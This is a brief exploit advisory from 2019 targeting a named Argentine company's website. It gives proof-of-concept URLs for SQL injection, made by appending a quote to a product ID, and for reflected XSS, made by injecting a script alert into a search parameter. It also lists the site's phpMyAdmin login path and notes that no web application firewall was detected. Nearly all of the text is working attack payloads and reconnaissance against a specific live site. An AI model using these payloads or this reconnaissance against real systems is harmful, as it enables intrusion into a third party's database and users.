Exploit Title: Don Quico Empresa (SQL Injection / XSS Reflected)
Discovered By: intrackeable
Date: 14/09/2019
Tested On: Linux Kubuntu
Category: WebApps
Vulnerability Type: CWE-89 / CWE-79
Vendor Home Page: donquicosh.com.ar
PoC:
http://donquicosh.com.ar/DetalleProductos.php?IdProducto=84%27
http://donquicosh.com.ar/Productos.php?Bus=%27%22%3Cscript%3Ealert(%22XSS%22)%3B%3C%2Fscript%3E
Admin Login Paths:
http://donquicosh.com.ar/phpmyadmin
WAF Detection:
No WAF detected by the generic detection.